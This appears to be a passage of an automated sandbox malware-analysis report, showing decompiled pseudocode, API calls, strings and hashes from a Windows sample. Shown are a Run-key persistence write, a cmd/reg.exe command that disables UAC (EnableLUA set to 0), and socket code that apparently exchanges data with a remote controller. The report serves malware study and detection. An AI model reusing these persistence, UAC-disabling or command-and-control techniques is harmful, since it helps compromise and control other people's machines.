                                  • RegCloseKey.ADVAPI32(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28), ref: 0040B801
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 0040B810
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 0040B81F
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                  • String ID:
                                  • API String ID: 1037601705-0
                                  • Opcode ID: e47ed06fcfe4702c07f1ce527c0755a331d7201bc4fedc9c1fec415c236eba45
                                  • Instruction ID: 16de392092bcd2de4e66c717f3c3c884efc51066479430e04c8b01777f2a524b
                                  • Opcode Fuzzy Hash: e47ed06fcfe4702c07f1ce527c0755a331d7201bc4fedc9c1fec415c236eba45
                                  • Instruction Fuzzy Hash: 4501A87204050DEFCF00AFA0EC998EA7B6DFB583597458035FD1996161D7329E14DBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 50%
                                  			E0040A0E1() {
                                  				struct _PROCESS_INFORMATION _v20;
                                  				struct _STARTUPINFOA _v88;
                                  				signed int _t17;
                                  
                                  				_t17 = 0x11;
                                  				memset( &_v88, 0, _t17 << 2);
                                  				_v88.cb = 0x44;
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
                                  				CloseHandle(_v20);
                                  				return CloseHandle(_v20.hThread);
                                  			}

                                  APIs
                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,0041BA38,0041BCB0), ref: 0040A11F
                                  • CloseHandle.KERNEL32(?), ref: 0040A12E
                                  • CloseHandle.KERNEL32(?), ref: 0040A133
                                  Strings
                                  • C:\Windows\System32\cmd.exe, xrefs: 0040A11A
                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040A115
                                  • D, xrefs: 0040A0F6
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle$CreateProcess
                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$D
                                  • API String ID: 2922976086-1747066916
                                  • Opcode ID: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                  • Instruction ID: 0928101be9c5a4b5cd6cbd2924aec545eff454ae04b53be068f3b7a54285d6aa
                                  • Opcode Fuzzy Hash: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                  • Instruction Fuzzy Hash: 5EF054B2A00518BEFB019BE8DC05EFFBB7DE784700F114436FA11F6060D6746D088AA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                  • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 2478582372-0
                                  • Opcode ID: f35f0c3dd271747c8617ee2a79da0f1b075a0c74f27328e3a593d3adc6a0a34e
                                  • Instruction ID: 9f96166dac4781290f3bd34c47d79f1531a5159583b3a655759a1da2a24b60ea
                                  • Opcode Fuzzy Hash: f35f0c3dd271747c8617ee2a79da0f1b075a0c74f27328e3a593d3adc6a0a34e
                                  • Instruction Fuzzy Hash: 50F0F97590060EEBCF04EFA0DD5D9EE7B78AF84349B008024F90697290DA70AA09CF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                  • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                  • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                  • String ID:
                                  • API String ID: 914748455-0
                                  • Opcode ID: 071d9129cc4c15a7588e784708c8bfb61fe96f0cebcdac03ffdaa68953a5de9b
                                  • Instruction ID: f669f26280469c21e485b93068b71aa9fa6b13bd9f3a6efc1e343f131735dcea
                                  • Opcode Fuzzy Hash: 071d9129cc4c15a7588e784708c8bfb61fe96f0cebcdac03ffdaa68953a5de9b
                                  • Instruction Fuzzy Hash: 08F0A97690450EEBCB04EFA0ED5DDEE7B78EB84305B048065F906972A0DA74AA09CF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00412DDF(void _a4, void* _a8) {
                                  				struct _OVERLAPPED* _t13;
                                  				void* _t16;
                                  				long _t17;
                                  				void* _t19;
                                  
                                  				_t13 = 0;
                                  				_t19 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
                                  				if(_t19 != 0xffffffff) {
                                  					_t17 = GetFileSize(_t19, 0);
                                  					__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z(_t17, 0, _t16);
                                  					_t8 =  &_a4;
                                  					_a4 = 0;
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  					if(ReadFile(_t19,  &_a4, _t17, _t8, 0) != 0) {
                                  						_t13 = 1;
                                  					}
                                  					CloseHandle(_t19);
                                  					return _t13;
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                  • CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E0D
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z.MSVCP60(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E1A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00000000,?,?,00409C9F,00000000), ref: 00412E2C
                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E34
                                  • CloseHandle.KERNEL32(00000000,?,00409C9F,00000000), ref: 00412E42
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@?resize@?$basic_string@CloseCreateHandleReadSize
                                  • String ID:
                                  • API String ID: 2061410294-0
                                  • Opcode ID: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                  • Instruction ID: e286a7eceb6258eec42f82ecdc09f82327f8599071822df4e1fbbe5006a6f2d0
                                  • Opcode Fuzzy Hash: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                  • Instruction Fuzzy Hash: EBF08171241518BFEB125F60EC88FFB7B6CEB867A4F108126FD15D6290CA744E418668
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E00413BC8() {
                                  				char _v20;
                                  				struct _WNDCLASSEXA _v68;
                                  				struct HWND__* _t21;
                                  				signed int _t23;
                                  
                                  				_t23 = 0xb;
                                  				memset( &(_v68.style), 0, _t23 << 2);
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsw");
                                  				_v68.cbSize = 0x30;
                                  				asm("movsb");
                                  				_v68.lpszClassName =  &_v20;
                                  				_v68.style = 0;
                                  				_v68.lpfnWndProc = E00413C3F;
                                  				_v68.cbClsExtra = 0;
                                  				_v68.cbWndExtra = 0;
                                  				_v68.lpszMenuName = 0;
                                  				if(RegisterClassExA( &_v68) == 0) {
                                  					L3:
                                  					return 0;
                                  				}
                                  				_t21 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
                                  				if(_t21 == 0) {
                                  					GetLastError();
                                  					goto L3;
                                  				}
                                  				return _t21;
                                  			}

                                  APIs
                                  • RegisterClassExA.USER32(00000030), ref: 00413C0E
                                  • CreateWindowExA.USER32 ref: 00413C29
                                  • GetLastError.KERNEL32(?,00000000), ref: 00413C33
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ClassCreateErrorLastRegisterWindow
                                  • String ID: 0$MsgWindowClass
                                  • API String ID: 2877667751-2410386613
                                  • Opcode ID: c722dd2e6d169ed387903e3056205791a775bb0513f46e273fb6c6412d1be798
                                  • Instruction ID: 7311bfe71f6f07f925a5bea5fd399074fa81e1952be4f1bddfc29815928cdf0b
                                  • Opcode Fuzzy Hash: c722dd2e6d169ed387903e3056205791a775bb0513f46e273fb6c6412d1be798
                                  • Instruction Fuzzy Hash: D5019A72C00228AACB21CF91EC08ADFBFB9EF45761B004026F410B6240D7B05606CAE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0040B522: RegOpenKeyExA.KERNEL32(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                    • Part of subcall function 0040B522: RegQueryValueExA.KERNEL32(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                    • Part of subcall function 0040B522: RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                    • Part of subcall function 0040B522: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,0041BCB0,0040310B,0041BA38,0041BCB0,00000000), ref: 004032DA
                                  • atoi.MSVCRT ref: 004032E1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,0041BCB0,0040310B,0041BA38,0041BCB0,00000000), ref: 004032ED
                                  Strings
                                  • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004032C1
                                  • CurrentBuildNumber, xrefs: 004032BC
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?c_str@?$basic_string@CloseD@1@@OpenQueryValueatoi
                                  • String ID: CurrentBuildNumber$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                  • API String ID: 1453687294-3377751560
                                  • Opcode ID: 11ba8fd773ccb4f0d3c70d753f9be5e0adae2c01f6dbf8595f5c6f89531c0230
                                  • Instruction ID: fd2564c0d0cdcb3147c4efd585e8939db476c869aa5c4bae27b80d41888a3fe0
                                  • Opcode Fuzzy Hash: 11ba8fd773ccb4f0d3c70d753f9be5e0adae2c01f6dbf8595f5c6f89531c0230
                                  • Instruction Fuzzy Hash: FFE04F72A00618E7C700B7A8DC0AFEEB768EB44755F504479B922A21D2EA749518C69C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004126EF(char _a4) {
                                  				void* _t2;
                                  				void* _t3;
                                  
                                  				_t1 =  &_a4; // 0x40e322
                                  				_t2 = GetCurrentProcess();
                                  				_t3 = GetCurrentThread();
                                  				return DuplicateHandle(GetCurrentProcess(), _t3, _t2,  *_t1, 0, 1, 2);
                                  			}

                                  APIs
                                  • GetCurrentProcess.KERNEL32("@,00000000,00000001,00000002,0041B310,?,0040E322,?), ref: 00412702
                                  • GetCurrentThread.KERNEL32 ref: 00412705
                                  • GetCurrentProcess.KERNEL32(00000000,?,0040E322,?), ref: 0041270C
                                  • DuplicateHandle.KERNEL32(00000000,?,0040E322,?), ref: 0041270F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Current$Process$DuplicateHandleThread
                                  • String ID: "@
                                  • API String ID: 3566409357-445313631
                                  • Opcode ID: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                  • Instruction ID: 81c68930a35107f79e7ff7c0b5ef314a0f7766eb9aca927b546ed436d96719c8
                                  • Opcode Fuzzy Hash: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                  • Instruction Fuzzy Hash: FFD09E71D40718B7D91127E5AC0DFCA3F1CDB49771F108421F60896090CAA594408A94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040AD26
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040AD30
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000068,?,?,?,?,?,?), ref: 0040AD44
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                    • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                    • Part of subcall function 00402149: recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                    • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                    • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                    • Part of subcall function 00402149: free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040AD6F,00000000,?,?,?,?,?,?), ref: 0040AD5B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040AD64
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@V01@@$D@2@@0@Hstd@@V01@V10@0@V?$basic_string@$??4?$basic_string@Y?$basic_string@connectfreemallocrecvsocket
                                  • String ID:
                                  • API String ID: 901373779-0
                                  • Opcode ID: 3b0df915b7b8e4d00f9c2cc29f0d686565e597e24b2e422b6d098feaf677391d
                                  • Instruction ID: 7b2f1eb0bf348bc8e64f130e1c0075fbfd626f93203aeb1fcbfc33f5f8d0b54a
                                  • Opcode Fuzzy Hash: 3b0df915b7b8e4d00f9c2cc29f0d686565e597e24b2e422b6d098feaf677391d
                                  • Instruction Fuzzy Hash: 4C01F272A0020867C700BF6AEC4B9EF7B2DDF94755F00043ABD02AB1C2EBB5595C82D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040DB4D
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 0040DB87
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 0040DB9B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@??1?$basic_string@$??4?$basic_string@V01@connectsocket
                                  • String ID:
                                  • API String ID: 1130490860-0
                                  • Opcode ID: 187dd77ae07796d47033cb0c66226a999a2e014d3950e60fa145c5b80a05b893
                                  • Instruction ID: e4a4367fee434e29a8f43c0c5b5fd0ad89fe5f7d667a2954b88e43abb6528f81
                                  • Opcode Fuzzy Hash: 187dd77ae07796d47033cb0c66226a999a2e014d3950e60fa145c5b80a05b893
                                  • Instruction Fuzzy Hash: E301CC3260020C8BC300BBF5AC5A5EF3722DB85354B5084BBEA126B1D1CBBC0888869E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E00405C62(void* __ecx) {
                                  				long _t7;
                                  				void* _t10;
                                  				void* _t18;
                                  				void* _t19;
                                  
                                  				_t18 = __ecx;                                   // this-pointer of the owning object
                                  				_t7 = CreateEventA(0, 0, 0, 0);                 // unnamed, auto-reset, initially non-signalled event
                                  				 *(_t18 + 0x34) = _t7;                          // kept at this+0x34; another thread signals it to wake this loop
                                  				if( *((char*)(_t18 + 0x3d)) != 0) {             // byte at this+0x3d: keep-running flag
                                  					_t10 = _t18 + 0x14;                         // std::string member at this+0x14
                                  					do {
                                  						// member == literal at 0x415664; the decompiler did not capture the result, so the
                                  						// following test of _t7 (eax) is on this comparison, not on CreateEventA/WaitForSingleObject
                                  						__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t10, 0x415664);
                                  						if(_t7 != 0) {
                                  							_t19 = _t19 - 0x10;                 // stack slot for a temporary std::string
                                  							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();   // copy-construct it from the member
                                  							E004020C2(0x41be70, 0x5a, _t10);    // formats into the global string at 0x41BE70 and sends it via 00402440 (send.WS2_32, see below); 0x5a is presumably a message type
                                  							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);   // member = literal at 0x415664 (reset)
                                  						}
                                  						_t7 = WaitForSingleObject( *(_t18 + 0x34), 0xffffffff);   // INFINITE: sleep until the event is signalled again
                                  					} while ( *((char*)(_t18 + 0x3d)) != 0);
                                  				}
                                  				return 1;
                                  			}
                                  
                                  Instruction addresses: 0x00405c6a, 0x00405c6d, 0x00405c77, 0x00405c7a, 0x00405c7c, 0x00405c84, 0x00405c86, 0x00405c90, 0x00405c92, 0x00405c98, 0x00405ca5, 0x00405cad, 0x00405cad, 0x00405cb8, 0x00405cbe, 0x00405c84, 0x00405cc9

                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,004052B3), ref: 00405C6D
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405C86
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405C98
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,0000005A), ref: 00405CAD
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405CB8
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@V01@@$??1?$basic_string@??4?$basic_string@??9std@@CreateD@2@@0@EventObjectSingleV01@V?$basic_string@Wait
                                  • String ID:
                                  • API String ID: 2456067102-0
                                  • Opcode ID: 0d899be78884d94ce1c1d17b2caedbeea4029945f3674705747b8005b05b442e
                                  • Instruction ID: 941b29cc010242a65ed123258a0f7c68229dc58979b588812575d9674897e9d1
                                  • Opcode Fuzzy Hash: 0d899be78884d94ce1c1d17b2caedbeea4029945f3674705747b8005b05b442e
                                  • Instruction Fuzzy Hash: 3BF0C875500B00BFE71017249D88AE73BADEB81321B44993EF45296AD1CB755C448F74
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00412996
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004129A8
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004129B4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004129D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004129DE
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?length@?$basic_string@A?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 1435062097-0
                                  • Opcode ID: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                  • Instruction ID: ff140a25c5046e2b9097d957d6cdce37f73a2c16b69e3829c68fb2596ec2fa1c
